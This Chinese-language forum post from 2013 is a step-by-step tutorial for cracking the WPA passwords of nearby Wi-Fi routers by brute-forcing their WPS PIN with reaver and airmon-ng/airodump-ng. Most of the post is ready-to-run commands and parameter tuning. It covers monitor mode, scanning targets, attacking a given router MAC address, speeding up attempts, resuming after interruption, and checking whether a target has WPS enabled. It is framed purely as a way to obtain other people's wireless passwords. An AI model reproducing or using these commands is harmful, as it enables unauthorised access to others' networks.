TA的每日心情 | 开心 2015-2-24 12:28 |
---|
签到天数: 95 天 [LV.6]常住居民II
|
发表于 2013-2-10 18:57:29
|
显示全部楼层
pin码破密特点:1、不需要客户端,2、有PIN码就能获得无线密码!!!
reaver使用方法、步骤:
打开 ROOt shell
如果电脑装有多个无线网卡,请先发指令
ifconfig -a
确认你用哪一个网卡WLAN0或WLAN1
下面的指令都是以单一网卡WLAN0为例
一、激活监听模式:
airmon-ng start wlan0
二、查看周边AP信息(抓包):
airodump-ng -w cap mon0
观察要破AP的PWR信号强弱变化,调整网卡放置位置和角度、方向。
PWR 小于 -75 基本上会Timeout, PWR-60左右,则非常顺畅(3-6秒攻击一次)
三、按Ctrl+C终止抓包
四、 抓PIN码:
reaver -i mon0 -b MAC -a -S -vv 注意:-S是大写的 -vv是两个V 如果把-vv变成-w就是不显示数字只显示进度。
例如:
airmon-ng start wlan0
airodump-ng -w cap mon0
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -a -S -vv
特别提示:
只有AP开启了WPS、QSS功能,才可以用PIN法破PSK密码!
如何查看AP是否开了WPS、QSS呢?
一、使用
airodump-ng -w cap mon0
MB一栏下,出现 54e. (看清楚有.) 是开WPS的
二、WIN7下,用通常的方式连接AP,如果在提示输入密码框下面,出现“通过按路由器按钮也可以连接”,
就确认此AP开了WPS、QSS。
PIN破密对信号要求极为严格,如果信号稍差,可能导致破密进度变慢或者路由死锁等(重复同一个PIN码 或 timeout)。
因此,确定网卡放置的最佳位置、方向、角度十分重要。
快速、简易确定对方无线路由器AP方位的技巧---探寻最佳信号接收位置
程序默认每尝试后停止一秒,加入参数使之不停止:
reaver -i mon0 -b C8:3A:35:F6:BB:B8 -vv -d 0
AP关闭了WPS、或者没有QSS滴,会出现
WARNING: Failed to associate with XX:XX:XX:XX:XX:XX (ESSID: XXXX)
破戒过程中 ,重复同一个PIN码 或 timeou t 可随时随地按Ctrl+C终止,reaver会自动保存进度。
重复第2-4项内容,先看看AP信号强弱或是否关机,
若继续破,则再次在终端中发送:
reaver -i mon0 -b MAC -vv
这条指令下达后,会让你选y或n,选y后就继续了
当reaver确定前4位PIN密码后,其工作完成任务进度数值将直接跳跃至90.9%以上,也就是说只剩余一千个密码组合了。总共一万一千个密码。
曙光就在前头,胜利往往在 再坚持一下的努力之中。
如果,90.9%进程后死机或停机,请记下PIN前四位数,用指令:
reaver -i mon0 -b MAC -a -vv -p XXXX(PIN前四位数)
会从指定PIN段起破密。
reaver -i mon0 -b MAC --pin=XXXX(PIN前四位数) -a -S -vv
使用方法:
airmon-ng start wlan0
reaver -i mon0 -b MAC -a -S -vv
-i 监听后接口名称
-b 目标mac地址
-a 自动检测目标AP最佳配置
-S 使用最小的DH key,可以提高PJ速度
-vv 显示更多的非严重警告
-d 即delay每穷举一次的闲置时间 预设为1秒
reaver -i mon0 -b MAC -d 0
用上述指令可以大幅加快PJ速度 但是有些AP可能受不了,做成不同步
-t 即timeout每次穷举等待反馈的最长时间,如果信号不错,可以这样设置
reaver -i mon0 -b MAC -d 0 -t .5
另外指定频道可以方便找到信号 -c 1
小结-PJ时应因状况调整参数:
信号非常好:
reaver -i mon0 -b MAC -a -S -vv -d 0 -c 1
信号普通:
reaver -i mon0 -b MAC -a -S -vv -d .5 -t .5 -c 1
信号一般:
reaver -i mon0 -b MAC -a -S -vv -c 1
|
|